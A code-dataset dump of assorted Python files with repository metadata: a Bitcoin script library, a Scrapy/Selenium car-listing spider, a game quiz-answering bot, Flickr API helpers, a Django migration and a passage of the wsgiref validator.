Dataset columns (type and observed range):
blob_id: string (length 40)
directory_id: string (length 40)
path: string (3 to 616 chars)
content_id: string (length 40)
detected_licenses: list (0 to 112 items)
license_type: string (2 classes)
repo_name: string (5 to 115 chars)
snapshot_id: string (length 40)
revision_id: string (length 40)
branch_name: string (777 classes)
visit_date: timestamp[us] (2015-08-06 10:31:46 to 2023-09-06 10:44:38)
revision_date: timestamp[us] (1970-01-01 02:38:32 to 2037-05-03 13:00:00)
committer_date: timestamp[us] (1970-01-01 02:38:32 to 2023-09-06 01:08:06)
github_id: int64 (4.92k to 681M, nullable)
star_events_count: int64 (0 to 209k)
fork_events_count: int64 (0 to 110k)
gha_license_id: string (22 classes)
gha_event_created_at: timestamp[us] (2012-06-04 01:52:49 to 2023-09-14 21:59:50, nullable)
gha_created_at: timestamp[us] (2008-05-22 07:58:19 to 2023-08-21 12:35:19, nullable)
gha_language: string (149 classes)
src_encoding: string (26 classes)
language: string (1 class)
is_vendor: bool (2 classes)
is_generated: bool (2 classes)
length_bytes: int64 (3 to 10.2M)
extension: string (188 classes)
content: string (3 to 10.2M chars)
authors: list (length 1)
author_id: string (1 to 132 chars)
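A minimal sketch of reading records with this schema via the Hugging Face datasets library; the dataset path below is a placeholder assumption, not taken from this dump.

from datasets import load_dataset

# Placeholder dataset path (assumption): substitute the actual dataset name.
ds = load_dataset("org/python-code-dump", split="train", streaming=True)

for row in ds:
    # Each record carries repo metadata plus the raw file contents.
    print(row["repo_name"], row["path"], row["length_bytes"])
    source_code = row["content"]  # the Python file as one string
    break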
fb5bf4f07951d84bf342ddda620e4f8ab7c0a109 | f65c78a69fbf9acb39f5b55a77565c491accccd1 | /libs/common/bitcoin/script.py | 5e4daafb10d6b6d794552c76082a923f8d133d76 | [
"MIT"
]
| permissive | Kevingislason/abacus_wallet | 8ac5b9f5edc33cba3812f98e0040729e8be6bd98 | 3c0f2d5134a6fa59fc1fd15fcad65690352a46bf | refs/heads/main | 2023-03-21T23:24:16.012416 | 2021-03-15T02:56:11 | 2021-03-15T02:56:11 | 334,851,360 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,916 | py | from .networks import NETWORKS
from . import base58
from . import bech32
from . import hashes
from . import compact
import io
SIGHASH_ALL = 1
class Script:
def __init__(self, data: bytes):
self.data = data[:]
def address(self, network=NETWORKS["main"]) -> str:
script_type = self.script_type()
data = self.data
if script_type is None:
raise ValueError("This type of script doesn't have address representation")
if script_type == "p2pkh":
d = network["p2pkh"] + data[3:23]
return base58.encode_check(d)
if script_type == "p2sh":
d = network["p2sh"] + data[2:22]
return base58.encode_check(d)
if script_type == "p2wpkh" or script_type == "p2wsh":
return bech32.encode(network["bech32"], data[0], data[2:])
# we should never get here
raise ValueError("Unsupported script type")
def script_type(self):
data = self.data
# OP_DUP OP_HASH160 <20:hash160(pubkey)> OP_EQUALVERIFY OP_CHECKSIG
if len(data) == 25 and data[:3] == b"\x76\xa9\x14" and data[-2:] == b"\x88\xac":
return "p2pkh"
# OP_HASH160 <20:hash160(script)> OP_EQUAL
if len(data) == 23 and data[:2] == b"\xa9\x14" and data[-1] == 0x87:
return "p2sh"
# 0 <20:hash160(pubkey)>
if len(data) == 22 and data[:2] == b"\x00\x14":
return "p2wpkh"
# 0 <32:sha256(script)>
if len(data) == 34 and data[:2] == b"\x00\x20":
return "p2wsh"
# unknown type
return None
def serialize(self) -> bytes:
return compact.to_bytes(len(self.data)) + self.data
@classmethod
def parse(cls, b: bytes) -> cls:
stream = io.BytesIO(b)
script = cls.read_from(stream)
if len(stream.read(1)) > 0:
raise ValueError("Too many bytes")
return script
@classmethod
def read_from(cls, stream) -> cls:
l = compact.read_from(stream)
data = stream.read(l)
if len(data) != l:
raise ValueError("Cant read %d bytes" % l)
return cls(data)
def __eq__(self, other):
return self.data == other.data
def __ne__(self, other):
return self.data != other.data
class Witness:
def __init__(self, items):
self.items = items[:]
def serialize(self) -> bytes:
res = compact.to_bytes(len(self.items))
for item in self.items:
res += compact.to_bytes(len(item)) + item
return res
@classmethod
def parse(cls, b: bytes) -> cls:
stream = io.BytesIO(b)
r = cls.read_from(stream)
if len(stream.read(1)) > 0:
raise ValueError("Byte array is too long")
return r
@classmethod
def read_from(cls, stream) -> cls:
num = compact.read_from(stream)
items = []
for i in range(num):
l = compact.read_from(stream)
data = stream.read(l)
items.append(data)
return cls(items)
def p2pkh(pubkey) -> Script:
"""Return Pay-To-Pubkey-Hash ScriptPubkey"""
return Script(b"\x76\xa9\x14" + hashes.hash160(pubkey.sec()) + b"\x88\xac")
def p2sh(script) -> Script:
"""Return Pay-To-Script-Hash ScriptPubkey"""
return Script(b"\xa9\x14" + hashes.hash160(script.data) + b"\x87")
def p2wpkh(pubkey) -> Script:
"""Return Pay-To-Witness-Pubkey-Hash ScriptPubkey"""
return Script(b"\x00\x14" + hashes.hash160(pubkey.sec()))
def p2wsh(script) -> Script:
"""Return Pay-To-Witness-Pubkey-Hash ScriptPubkey"""
return Script(b"\x00\x20" + hashes.sha256(script.data))
def p2pkh_from_p2wpkh(script) -> Script:
"""Convert p2wpkh to p2pkh script"""
return Script(b"\x76\xa9" + script.serialize()[2:] + b"\x88\xac")
def multisig(m: int, pubkeys) -> Script:
if m <= 0 or m > 16:
raise ValueError("m must be between 1 and 16")
n = len(pubkeys)
if n < m or n > 16:
raise ValueError("Number of pubkeys must be between %d and 16" % m)
data = bytes([80 + m])
for pubkey in pubkeys:
sec = pubkey.sec()
data += bytes([len(sec)]) + sec
# OP_m <len:pubkey> ... <len:pubkey> OP_n OP_CHECKMULTISIG
data += bytes([80 + n, 0xAE])
return Script(data)
def address_to_scriptpubkey(addr):
pass
def script_sig_p2pkh(signature, pubkey) -> Script:
sec = pubkey.sec()
der = signature.serialize() + bytes([SIGHASH_ALL])
data = compact.to_bytes(len(der)) + der + compact.to_bytes(len(sec)) + sec
return Script(data)
def script_sig_p2sh(redeem_script) -> Script:
"""Creates scriptsig for p2sh"""
# FIXME: implement for legacy p2sh as well
return Script(redeem_script.serialize())
def witness_p2wpkh(signature, pubkey) -> Witness:
return Witness([signature.serialize() + bytes([SIGHASH_ALL]), pubkey.sec()])
| [
"[email protected]"
]
| |
1ce44c79b815d8df6680a3212721e78e49837ae6 | 138c1b7a726386b6e9bafb9fcd42c7e62d9fe49e | /ScrapyProjects/DynamicSpider/DynamicSpider/spiders/guazi.py | b662668c881943737dbbd1a9bd8a5ed621eb1462 | []
| no_license | zhujixiang1997/1805_spider | 951bf6e5d411c0b24b33adf788c9d8a5770f244b | 5cd617e5e3263d13854e19c16a1659017a8ed409 | refs/heads/master | 2022-12-11T01:10:54.232536 | 2019-07-09T10:28:30 | 2019-07-09T10:28:30 | 163,835,828 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,575 | py | # -*- coding: utf-8 -*-
import scrapy
from ScrapyProjects.DynamicSpider.DynamicSpider.items import GuaziCarItem
from ScrapyProjects.DynamicSpider.DynamicSpider.utils.bshead import create_bs_driver
'''
Scrapes Wuhan used-car listings from guazi.com (the Guazi used-car direct-sale site).
Analysis: fetching the page with scrapy shell and inspecting it showed the listing data cannot be obtained from the static HTML, so selenium is introduced.
Approach: scrapy + selenium
'''
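# Editor's sketch (not part of the original project): the scrapy + selenium plan
# described above is usually wired together through a downloader middleware that
# renders each page with the spider's shared driver and hands scrapy an
# HtmlResponse. The class name SeleniumMiddleware below is an illustrative
# assumption, not the project's actual middleware.
#
#   from scrapy.http import HtmlResponse
#
#   class SeleniumMiddleware(object):
#       def process_request(self, request, spider):
#           # Let the real browser render the dynamic listing page.
#           spider.driver.get(request.url)
#           # Return the rendered HTML so the spider callbacks can use normal XPath.
#           return HtmlResponse(url=request.url,
#                               body=spider.driver.page_source,
#                               encoding='utf-8', request=request)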
class GuaziSpider(scrapy.Spider):
name = 'guazi'
allowed_domains = ['www.guazi.com']
start_urls = ['http://www.guazi.com/wh/buy/']
query_key = input("Please enter a keyword: ")
def __init__(self):
scrapy.Spider.__init__(self, self.name)
self.driver = create_bs_driver()
self.driver.set_page_load_timeout(20)
def __del__(self):
self.driver.quit()
def start_requests(self):
# Override the initial url requests, attaching meta info so the downloader middleware can recognize them
for url in self.start_urls:
yield scrapy.Request(url=url, meta={'type':'home','query_key':self.query_key}, callback=self.parse, dont_filter=True)
def parse(self, response):
print(f"{response.url}")
cal_li_list = response.xpath("//ul[@class='carlist clearfix js-top']/li")
for cal_li in cal_li_list:
car_name = cal_li.xpath("./a/h2/text()").extract_first()
car_image = cal_li.xpath("./a/img/@src").extract_first()
car_detail_url = cal_li.xpath("./a/@href").extract_first()
meta=dict(car_name=car_name,car_image=car_image,type="detail")
yield scrapy.Request(url=f"https://www.guazi.com{car_detail_url}", meta=meta, callback=self.parse_detail, dont_filter=True)
# fetch the next page
next_url = response.url
meta = dict(type="next_page")
yield scrapy.Request(url=next_url, meta=meta, callback=self.parse, dont_filter=True)
def parse_detail(self,response):
car_name=response.meta.get("car_name")
car_image=response.meta.get("car_image")
registration_time = response.xpath("//ul[@class='assort clearfix']/li[1]/span/text()").extract_first()
mileage = response.xpath("//ul[@class='assort clearfix']/li[2]/span/text()").extract_first()
license_plate = response.xpath("//ul[@class='assort clearfix']/li[3]/span/text()").extract_first()
displacement = response.xpath("//ul[@class='assort clearfix']/li[4]/span/text()").extract_first()
transmission = response.xpath("//ul[@class='assort clearfix']/li[5]/span/text()").extract_first()
price = response.xpath("//div[@class='pricebox js-disprice']/span[1]/text()").extract_first()
result = {
'car_name':car_name if car_name else None,
'car_image':car_image if car_image else None,
'registration_time':registration_time if registration_time else None,
'mileage':mileage if mileage else None,
'license_plate':license_plate if license_plate else None,
'displacement':displacement if displacement else None,
'transmission':transmission if transmission else None,
'price':price+'万' if price else None,
}
item = GuaziCarItem(
car_name=result['car_name'],
car_image=result['car_image'],
registration_time=result['registration_time'],
mileage=result['mileage'],
license_plate=result['license_plate'],
displacement=result['displacement'],
transmission=result['transmission'],
price=result['price'],
)
yield item
| [
"[email protected]"
]
| |
32d15c69d2a035c6bbc6bbe67bbb271dd540c1f0 | 731230c336bf27af8ca91f15c33435920a5c3af4 | /virtual/bin/wheel | 599ecec06807b1ead412bf660847330f6744e209 | [
"MIT"
]
| permissive | Brayonski/personal-blog | c627adbddf66271594f07e7bd3e3b2069c9aff08 | ab0cb6590b570ed75a475a52eae9bafadc647665 | refs/heads/master | 2020-03-28T17:34:10.867299 | 2018-09-17T13:10:12 | 2018-09-17T13:10:12 | 148,802,537 | 0 | 0 | null | 2018-10-11T13:39:58 | 2018-09-14T14:48:33 | Python | UTF-8 | Python | false | false | 281 | #!/media/root/Alpha/projects/MS-Python-Pre-work/flask/personal-blog/virtual/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from wheel.tool import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(main())
| [
"[email protected]"
]
| ||
3210b53b1f11a7512ae651e9a24340fa8190d8c2 | cfd9fa1af735ac3572954704a47e35543850b244 | /lantern.py | 6811ad214abe5ef2f1a2dfe9f75e48022f4f9798 | []
| no_license | xingyueGK/hjsg | c1844ea8161d254f6d6cf70f42d1ac849e117438 | be0c4c457bdfaa9178f25f9f722dc78d88f24540 | refs/heads/master | 2022-12-12T08:28:55.823357 | 2020-12-05T12:02:06 | 2020-12-05T12:02:06 | 147,184,573 | 0 | 1 | null | 2022-01-06T22:26:48 | 2018-09-03T09:47:04 | HTML | UTF-8 | Python | false | false | 6,224 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2019/2/19 15:08
# @Author : xingyue
# @File : lantern.py
from task.base import SaoDangFb
import threading
import os, time
import redis
pool = redis.ConnectionPool(host='localhost', port=6379, db=0)
_redis = redis.StrictRedis(connection_pool=pool)
lock = threading.RLock()
class task(SaoDangFb):
def lanternIndex(self):
stats = self.action(c='guess_lantern', m='index')
if stats['status']== 1:
print 'start answering the quiz'
else:
self.p(stats)
exit(2)
def lantern_festival(self):
try:
answer = {
"1": "a",
"2": "b",
"3": "c",
"4": "d",
"5": "b",
"6": "d",
"7": "d",
"8": "d",
"9": "d",
"10": "a",
"11": "a",
"12": "a",
"13": "b",
"14": "b",
"15": "a",
"16": "c",
"17": "b",
"18": "d",
"19": "a",
"20": "c",
"21": "c",
"22": "a",
"23": "d",
"24": "a",
"25": "a",
"26": "c",
"27": "a",
"28": "b",
"29": "a",
"30": "a",
"31": "a",
"32": "b",
"33": "b",
"34": "b",
"35": "c",
"36": "c",
"37": "d",
"38": "d",
"39": "c",
"40": "b",
"41": "a",
"42": "a",
"44": "a",
"45": "b",
"46": "c",
"48": "a",
"49": "b",
"50": "d",
"51": "c",
"52": "a",
"54": "a",
"55": "d",
"56": "d",
"58": "b",
"59": "b",
"61": "d",
"62": "d",
"63": "d",
"67": "b",
"68": "a",
"69": "b",
"71": "d",
"73": "b",
"74": "a",
"75": "d",
"76": "a",
"77": "b",
"78": "b",
"43": "d",
"47": "d",
"53": "c",
"57": "d",
"60": "c",
"64": "d",
"65": "d",
"66": "b",
"70": "c",
"72": "a",
"79": "c",
"80": "a",
"81": "a",
"82": "d",
"83": "b",
"84": "a",
"85": "c",
"86": "b",
"87": "b",
"88": "b",
"89": "d",
"90": "d",
"91": "b",
"92": "c",
"93": "c",
"94": "b",
"95": "c",
"96": "a",
"97": "d",
"98": "d",
"99": "a",
"100": "c",
"101": "c",
"102": "a",
"103": "b",
"104": "a",
"105": "c",
"106": "a",
"107": "a",
"108": "b",
"109": "c",
"110": "b",
"111": "d",
"112": "b",
"113": "d",
"114": "b",
"115": "a",
"116": "a",
"117": "b",
"118": "b",
"119": "c",
"120": "d",
}
resutl = self.action(c='guess_lantern', m='answer_index')
time.sleep(0.5)
total_num = int(resutl['total_num'])
for i in range(total_num):
questiont = resutl['question']
id = questiont['id']
try:
formdata = {
'right': answer[id]
}
except KeyError as e:
print 'id error: question id exceeds the known answer range'
self.p(questiont, 'iderror')
formdata = {
'right': 'a'
}
resutl = self.action(c='guess_lantern', m='check', body=formdata)
self.p(resutl,'resieeeeeeee')
while True:
if resutl['status'] == 1:
if resutl['right'] == 1:
time.sleep(2)
break
else:
self.p(resutl, 'check result')
print formdata
break
elif resutl['status'] == -10:
time.sleep(5)
resutl = self.action(c='guess_lantern', m='check', body=formdata)
except KeyError as e:
self.p(resutl, 'error')
print 'eeeee',e
def get_reward(self):
self.action(c='guess_lantern', m='get_reward', id=1)
if __name__ == '__main__':
def act(user, apass, addr):
action = task(user, apass, addr)
action.lanternIndex()  # start the quiz
action.lantern_festival()
action.get_reward()
filepath = os.path.dirname(os.path.abspath(__file__))
# cont = ['21user.txt', 'autouser.txt','gmnewyear.txt', 'user.txt', 'alluser.txt']
cont = ['user.txt']
for t in cont:
with open('%s/users/%s' % (filepath, t), 'r') as f:
for i in f:
if i.strip() and not i.startswith('#'):
name = i.split()[0]
passwd = i.split()[1]
addr = i.split()[2]
# addr = 21
t1 = threading.Thread(target=act, args=(name, passwd, addr))
t1.start()
time.sleep(0.2)
| [
"[email protected]"
]
| |
068b41a94bea56acb225e23b723347f3b9e3b552 | 8fc9520d7224e6179f63f19e668b4b3b6a7d76c5 | /apps/networks/libraries/flickr/tools.py | 983d95c4458171972fa5c25ad14ae1aa7f71d267 | []
| no_license | quantm/custom_django_oscar | 352ef2fd95e7da932958d4aa80d77dff5b6c1e70 | 9205807030ab360884283810e94177440c228a23 | refs/heads/master | 2016-08-09T12:23:39.413677 | 2016-02-08T22:16:53 | 2016-02-08T22:16:53 | 51,326,524 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,084 | py | from method_call import call_api
import sys
import os
def load_methods():
"""
Loads the list of all methods
"""
r = call_api(method="flickr.reflection.getMethods")
return r["methods"]["method"]
__perms__ = {0: 'none', '1': 'read', '2': 'write', '3': 'delete'}
def methods_info():
methods = {}
for m in load_methods():
info = call_api(method="flickr.reflection.getMethodInfo",
method_name=m)
info.pop("stat")
method = info.pop("method")
method["requiredperms"] = __perms__[method["requiredperms"]]
method["needslogin"] = bool(method.pop("needslogin"))
method["needssigning"] = bool(method.pop("needssigning"))
info.update(method)
info["arguments"] = info["arguments"]["argument"]
info["errors"] = info["errors"]["error"]
methods[m] = info
return methods
def write_reflection(path, template, methods=None):
if methods is None:
methods = methods_info()
with open(template, "r") as t:
templ = t.read()
prefix = ""
new_templ = ""
tab = " "
templ = templ % str(methods)
for c in templ:
if c == '{':
new_templ += '{\n' + prefix
prefix += tab
elif c == '}':
new_templ += '\n' + prefix + '}\n' + prefix
prefix = prefix[:-len(tab)]
else:
new_templ += c
with open(path, "w") as f:
f.write(new_templ)
def write_doc(output_path, exclude=["flickr_keys", "methods"]):
import flickr_api
exclude.append("__init__")
modules = ['flickr_api']
dir = os.path.dirname(flickr_api.__file__)
modules += [
"flickr_api." + f[:-3]
for f in os.listdir(dir)
if f.endswith(".py") and f[:-3] not in exclude]
sys.path.insert(0, dir + "../")
if not os.path.exists(output_path):
os.makedirs(output_path)
os.chdir(output_path)
for m in modules:
os.system("pydoc -w " + m)
| [
"[email protected]"
]
| |
af55ae8008e31b19d12765e34394ed945e13896b | f672f2c2b35d388526217278f3c301d4372abb4b | /cartoview/app_manager/migrations/0001_initial.py | 31b23a5245af1452dea592580640ac9fb684c4cb | [
"BSD-2-Clause"
]
| permissive | Msalah593/cartoview_2 | cce51db13f3e69e99a4915770627942d21a998a8 | dc57cc22cdc4563ff76448b939c09c370590114f | refs/heads/master | 2020-05-05T12:29:26.333491 | 2019-04-22T08:52:52 | 2019-04-22T08:52:52 | 180,030,874 | 0 | 0 | null | 2019-04-07T22:22:08 | 2019-04-07T22:22:08 | null | UTF-8 | Python | false | false | 1,764 | py | # Generated by Django 2.2 on 2019-04-18 14:17
import django.contrib.postgres.fields.jsonb
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='App',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=200, unique=True)),
('title', models.CharField(max_length=200, unique=True)),
('description', models.TextField(blank=True, null=True)),
('license', models.CharField(blank=True, max_length=200, null=True)),
('date_installed', models.DateTimeField(auto_now_add=True, null=True, verbose_name='Date Installed')),
('single_instance', models.BooleanField(default=False)),
('status', models.CharField(default='Alpha', max_length=100)),
('app_img_url', models.TextField(blank=True, max_length=1000, null=True)),
('version', models.CharField(max_length=10)),
('order', models.IntegerField(default=0, unique=True)),
('default_config', django.contrib.postgres.fields.jsonb.JSONField(blank=True, default=dict, null=True)),
('created_at', models.DateTimeField(auto_now_add=True)),
('updated_at', models.DateTimeField(auto_now=True)),
],
options={
'ordering': ['order'],
'permissions': (('install_app', 'Install App'), ('uninstall_app', 'Uninstall App'), ('change_state', 'Change App State (active, suspend)')),
},
),
]
| [
"[email protected]"
]
| |
8396320380ca63e38dcfcc70b5428ef49c1972ad | 6437a3a4a31ab9ad233d6b2d985beb50ed50de23 | /PythonistaAppTemplate/PythonistaKit.framework/pylib/wsgiref/validate.py | b5577e5bbf54a2e99cc84fc8a1e1f3b1edf2aaa9 | []
| no_license | sreyemnayr/jss-lost-mode-app | 03ddc472decde3c17a11294d8ee48b02f83b71e7 | 3ff4ba6fb13f4f3a4a98bfc824eace137f6aabaa | refs/heads/master | 2021-05-02T08:50:10.580091 | 2018-02-08T20:32:29 | 2018-02-08T20:32:29 | 120,813,623 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 19,451 | py | #\input texinfo
# Licensed under the MIT license: http://www.opensource.org/licenses/mit-license.php
# Also licenced under the Apache License, 2.0: http://opensource.org/licenses/apache2.0.php
# Licensed to PSF under a Contributor Agreement
"""
Middleware to check for obedience to the WSGI specification.
Some of the things this checks:
* Signature of the application and start_response (including that
keyword arguments are not used).
* Environment checks:
- Environment is a dictionary (and not a subclass).
- That all the required keys are in the environment: REQUEST_METHOD,
SERVER_NAME, SERVER_PORT, wsgi.version, wsgi.input, wsgi.errors,
wsgi.multithread, wsgi.multiprocess, wsgi.run_once
- That HTTP_CONTENT_TYPE and HTTP_CONTENT_LENGTH are not in the
environment (these headers should appear as CONTENT_LENGTH and
CONTENT_TYPE).
- Warns if QUERY_STRING is missing, as the cgi module acts
unpredictably in that case.
- That CGI-style variables (that don't contain a .) have
(non-unicode) string values
- That wsgi.version is a tuple
- That wsgi.url_scheme is 'http' or 'https' (@@: is this too
restrictive?)
- Warns if the REQUEST_METHOD is not known (@@: probably too
restrictive).
- That SCRIPT_NAME and PATH_INFO are empty or start with /
- That at least one of SCRIPT_NAME or PATH_INFO are set.
- That CONTENT_LENGTH is a positive integer.
- That SCRIPT_NAME is not '/' (it should be '', and PATH_INFO should
be '/').
- That wsgi.input has the methods read, readline, readlines, and
__iter__
- That wsgi.errors has the methods flush, write, writelines
* The status is a string, contains a space, starts with an integer,
and that integer is in range (> 100).
* That the headers is a list (not a subclass, not another kind of
sequence).
* That the items of the headers are tuples of strings.
* That there is no 'status' header (that is used in CGI, but not in
WSGI).
* That the headers don't contain newlines or colons, end in _ or -, or
contain characters codes below 037.
* That Content-Type is given if there is content (CGI often has a
default content type, but WSGI does not).
* That no Content-Type is given when there is no content (@@: is this
too restrictive?)
* That the exc_info argument to start_response is a tuple or None.
* That all calls to the writer are with strings, and no other methods
on the writer are accessed.
* That wsgi.input is used properly:
- .read() is called with zero or one argument
- That it returns a string
- That readline, readlines, and __iter__ return strings
- That .close() is not called
- No other methods are provided
* That wsgi.errors is used properly:
- .write() and .writelines() is called with a string
- That .close() is not called, and no other methods are provided.
* The response iterator:
- That it is not a string (it should be a list of a single string; a
string will work, but perform horribly).
- That .next() returns a string
- That the iterator is not iterated over until start_response has
been called (that can signal either a server or application
error).
- That .close() is called (doesn't raise exception, only prints to
sys.stderr, because we only know it isn't called when the object
is garbage collected).
"""
__all__ = ['validator']
import re
import sys
from types import DictType, StringType, TupleType, ListType
import warnings
header_re = re.compile(r'^[a-zA-Z][a-zA-Z0-9\-_]*$')
bad_header_value_re = re.compile(r'[\000-\037]')
class WSGIWarning(Warning):
"""
Raised in response to WSGI-spec-related warnings
"""
def assert_(cond, *args):
if not cond:
raise AssertionError(*args)
def validator(application):
"""
When applied between a WSGI server and a WSGI application, this
middleware will check for WSGI compliancy on a number of levels.
This middleware does not modify the request or response in any
way, but will raise an AssertionError if anything seems off
(except for a failure to close the application iterator, which
will be printed to stderr -- there's no way to raise an exception
at that point).
"""
def lint_app(*args, **kw):
assert_(len(args) == 2, "Two arguments required")
assert_(not kw, "No keyword arguments allowed")
environ, start_response = args
check_environ(environ)
# We use this to check if the application returns without
# calling start_response:
start_response_started = []
def start_response_wrapper(*args, **kw):
assert_(len(args) == 2 or len(args) == 3, (
"Invalid number of arguments: %s" % (args,)))
assert_(not kw, "No keyword arguments allowed")
status = args[0]
headers = args[1]
if len(args) == 3:
exc_info = args[2]
else:
exc_info = None
check_status(status)
check_headers(headers)
check_content_type(status, headers)
check_exc_info(exc_info)
start_response_started.append(None)
return WriteWrapper(start_response(*args))
environ['wsgi.input'] = InputWrapper(environ['wsgi.input'])
environ['wsgi.errors'] = ErrorWrapper(environ['wsgi.errors'])
iterator = application(environ, start_response_wrapper)
assert_(iterator is not None and iterator != False,
"The application must return an iterator, if only an empty list")
check_iterator(iterator)
return IteratorWrapper(iterator, start_response_started)
return lint_app
class InputWrapper:
def __init__(self, wsgi_input):
self.input = wsgi_input
def read(self, *args):
assert_(len(args) <= 1)
v = self.input.read(*args)
assert_(type(v) is type(""))
return v
def readline(self):
v = self.input.readline()
assert_(type(v) is type(""))
return v
def readlines(self, *args):
assert_(len(args) <= 1)
lines = self.input.readlines(*args)
assert_(type(lines) is type([]))
for line in lines:
assert_(type(line) is type(""))
return lines
def __iter__(self):
while 1:
line = self.readline()
if not line:
return
yield line
def close(self):
assert_(0, "input.close() must not be called")
class ErrorWrapper:
def __init__(self, wsgi_errors):
self.errors = wsgi_errors
def write(self, s):
assert_(type(s) is type(""))
self.errors.write(s)
def flush(self):
self.errors.flush()
def writelines(self, seq):
for line in seq:
self.write(line)
def close(self):
assert_(0, "errors.close() must not be called")
class WriteWrapper:
def __init__(self, wsgi_writer):
self.writer = wsgi_writer
def __call__(self, s):
assert_(type(s) is type(""))
self.writer(s)
class PartialIteratorWrapper:
def __init__(self, wsgi_iterator):
self.iterator = wsgi_iterator
def __iter__(self):
# We want to make sure __iter__ is called
return IteratorWrapper(self.iterator, None)
class IteratorWrapper:
def __init__(self, wsgi_iterator, check_start_response):
self.original_iterator = wsgi_iterator
self.iterator = iter(wsgi_iterator)
self.closed = False
self.check_start_response = check_start_response
def __iter__(self):
return self
def next(self):
assert_(not self.closed,
"Iterator read after closed")
v = self.iterator.next()
if self.check_start_response is not None:
assert_(self.check_start_response,
"The application returns and we started iterating over its body, but start_response has not yet been called")
self.check_start_response = None
return v
def close(self):
self.closed = True
if hasattr(self.original_iterator, 'close'):
self.original_iterator.close()
def __del__(self):
if not self.closed:
sys.stderr.write(
"Iterator garbage collected without being closed")
assert_(self.closed,
"Iterator garbage collected without being closed")
def check_environ(environ):
assert_(type(environ) is DictType,
"Environment is not of the right type: %r (environment: %r)"
% (type(environ), environ))
for key in ['REQUEST_METHOD', 'SERVER_NAME', 'SERVER_PORT',
'wsgi.version', 'wsgi.input', 'wsgi.errors',
'wsgi.multithread', 'wsgi.multiprocess',
'wsgi.run_once']:
assert_(key in environ,
"Environment missing required key: %r" % (key,))
for key in ['HTTP_CONTENT_TYPE', 'HTTP_CONTENT_LENGTH']:
assert_(key not in environ,
"Environment should not have the key: %s "
"(use %s instead)" % (key, key[5:]))
if 'QUERY_STRING' not in environ:
warnings.warn(
'QUERY_STRING is not in the WSGI environment; the cgi '
'module will use sys.argv when this variable is missing, '
'so application errors are more likely',
WSGIWarning)
for key in environ.keys():
if '.' in key:
# Extension, we don't care about its type
continue
assert_(type(environ[key]) is StringType,
"Environmental variable %s is not a string: %r (value: %r)"
% (key, type(environ[key]), environ[key]))
assert_(type(environ['wsgi.version']) is TupleType,
"wsgi.version should be a tuple (%r)" % (environ['wsgi.version'],))
assert_(environ['wsgi.url_scheme'] in ('http', 'https'),
"wsgi.url_scheme unknown: %r" % environ['wsgi.url_scheme'])
check_input(environ['wsgi.input'])
check_errors(environ['wsgi.errors'])
# @@: these need filling out:
if environ['REQUEST_METHOD'] not in (
'GET', 'HEAD', 'POST', 'OPTIONS','PUT','DELETE','TRACE'):
warnings.warn(
"Unknown REQUEST_METHOD: %r" % environ['REQUEST_METHOD'],
WSGIWarning)
assert_(not environ.get('SCRIPT_NAME')
or environ['SCRIPT_NAME'].startswith('/'),
"SCRIPT_NAME doesn't start with /: %r" % environ['SCRIPT_NAME'])
assert_(not environ.get('PATH_INFO')
or environ['PATH_INFO'].startswith('/'),
"PATH_INFO doesn't start with /: %r" % environ['PATH_INFO'])
if environ.get('CONTENT_LENGTH'):
assert_(int(environ['CONTENT_LENGTH']) >= 0,
"Invalid CONTENT_LENGTH: %r" % environ['CONTENT_LENGTH'])
if not environ.get('SCRIPT_NAME'):
assert_('PATH_INFO' in environ,
"One of SCRIPT_NAME or PATH_INFO are required (PATH_INFO "
"should at least be '/' if SCRIPT_NAME is empty)")
assert_(environ.get('SCRIPT_NAME') != '/',
"SCRIPT_NAME cannot be '/'; it should instead be '', and "
"PATH_INFO should be '/'")
def check_input(wsgi_input):
for attr in ['read', 'readline', 'readlines', '__iter__']:
assert_(hasattr(wsgi_input, attr),
"wsgi.input (%r) doesn't have the attribute %s"
% (wsgi_input, attr))
def check_errors(wsgi_errors):
for attr in ['flush', 'write', 'writelines']:
assert_(hasattr(wsgi_errors, attr),
"wsgi.errors (%r) doesn't have the attribute %s"
% (wsgi_errors, attr))
def check_status(status):
assert_(type(status) is StringType,
"Status must be a string (not %r)" % status)
# Implicitly check that we can turn it into an integer:
status_code = status.split(None, 1)[0]
assert_(len(status_code) == 3,
"Status codes must be three characters: %r" % status_code)
status_int = int(status_code)
assert_(status_int >= 100, "Status code is invalid: %r" % status_int)
if len(status) < 4 or status[3] != ' ':
warnings.warn(
"The status string (%r) should be a three-digit integer "
"followed by a single space and a status explanation"
% status, WSGIWarning)
def check_headers(headers):
assert_(type(headers) is ListType,
"Headers (%r) must be of type list: %r"
% (headers, type(headers)))
header_names = {}
for item in headers:
assert_(type(item) is TupleType,
"Individual headers (%r) must be of type tuple: %r"
% (item, type(item)))
assert_(len(item) == 2)
name, value = item
assert_(name.lower() != 'status',
"The Status header cannot be used; it conflicts with CGI "
"script, and HTTP status is not given through headers "
"(value: %r)." % value)
header_names[name.lower()] = None
assert_('\n' not in name and ':' not in name,
"Header names may not contain ':' or '\\n': %r" % name)
assert_(header_re.search(name), "Bad header name: %r" % name)
assert_(not name.endswith('-') and not name.endswith('_'),
"Names may not end in '-' or '_': %r" % name)
if bad_header_value_re.search(value):
assert_(0, "Bad header value: %r (bad char: %r)"
% (value, bad_header_value_re.search(value).group(0)))
def check_content_type(status, headers):
code = int(status.split(None, 1)[0])
# @@: need one more person to verify this interpretation of RFC 2616
# http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
NO_MESSAGE_BODY = (204, 304)
for name, value in headers:
if name.lower() == 'content-type':
if code not in NO_MESSAGE_BODY:
return
assert_(0, ("Content-Type header found in a %s response, "
"which must not return content.") % code)
if code not in NO_MESSAGE_BODY:
assert_(0, "No Content-Type header found in headers (%s)" % headers)
def check_exc_info(exc_info):
assert_(exc_info is None or type(exc_info) is type(()),
"exc_info (%r) is not a tuple: %r" % (exc_info, type(exc_info)))
# More exc_info checks?
def check_iterator(iterator):
